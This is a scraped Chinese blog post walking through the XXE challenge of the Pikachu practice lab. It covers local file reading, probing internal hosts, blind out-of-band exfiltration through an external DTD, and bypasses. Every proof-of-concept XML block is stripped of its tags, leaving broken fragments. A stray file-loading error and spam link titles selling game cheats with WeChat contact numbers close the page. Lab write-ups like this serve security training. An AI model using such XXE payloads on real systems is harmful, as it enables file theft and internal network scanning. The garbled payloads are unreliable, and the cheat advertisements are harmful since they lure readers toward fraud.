Pikachu靶场之XXE漏洞
创始人
2025-05-31 02:58:30

Pikachu靶场之XXE漏洞

  • 一、XML和XXE的区别
  • 二、解题
      • 1.1 前提
      • 1.2 使用代码进行文件读取
      • 1.3 内网探针或攻击内网应用
      • 1.4 RCE
      • 1.5 无回显读取文件
      • 1.6 xxe绕过

一、XML和XXE的区别

XML是传递数据的一种格式,而XXE是XML传递数据过程中产生的一种漏洞,两者是完全不同的

二、解题

1.1 前提

  • 靶场地址:http://192.168.93.134/pikachu/vul/xxe/xxe.php
  • 靶机操作系统:Windows10

如下是文件地址:

在这里插入图片描述

1.2 使用代码进行文件读取

  1. 前提:

    对接收到的数据进行输出显示:

    在这里插入图片描述

  2. POC

    如下POC是固定格式,只需要更改文件地址就可以读取不同的文件

    

]>
&xxe;

    在这里插入图片描述

1.3 内网探针或攻击内网应用

  1. 前提:

    地址文件必须正确:

  2. POC

    	


]>
&rabbit;

    上面的ip地址假设就是内网的一台服务器的ip地址。还可以进行一个端口扫描,看一下端口是否开放。

1.4 RCE

需要引入外部实体,一般遇不到

1.5 无回显读取文件

POC代码


%dtd;%send;
]>

www目录下文件:

"
>
%payload;

1.6 xxe绕过

xxe绕过

词库加载错误:未能找到文件“E:\highferrum_mysql\Configuration\Dict_Stopwords.txt”。

上一篇:分享实测“新海贝之城究竟是不是有挂”其实确实有挂

下一篇:实测讲解.永州扯胡子到底是不是挂.详细开挂教程!

相关内容

热门资讯

给大家科普一下「中至南昌麻将」... 给大家科普一下「中至南昌麻将」怎么开挂亲,中至南昌麻将这个游戏其实有挂的,确实是有挂的,需要了解加客...
玩家实测“一起宁德麻将有挂吗可... 您好:一起宁德麻将这款游戏可以开挂,确实是有挂的,需要了解加客服微信【3636476】很多玩家在这款...
最新消息“旺旺福建麻将究竟有挂... 您好:旺旺福建麻将这款游戏可以开挂,确实是有挂的,需要了解加客服微信【8383742】很多玩家在这款...
重磅来袭“欢乐联赛,是不是有挂... 亲.欢乐联赛,这款游戏是可以开挂的,确实是有挂的,通过添加客服【3716361】很多玩家在这款游戏中...
玩家实测“新八戒究竟有没有挂吗... 您好:新八戒这款游戏可以开挂,确实是有挂的,需要了解加客服微信【8700483】很多玩家在新八戒这款...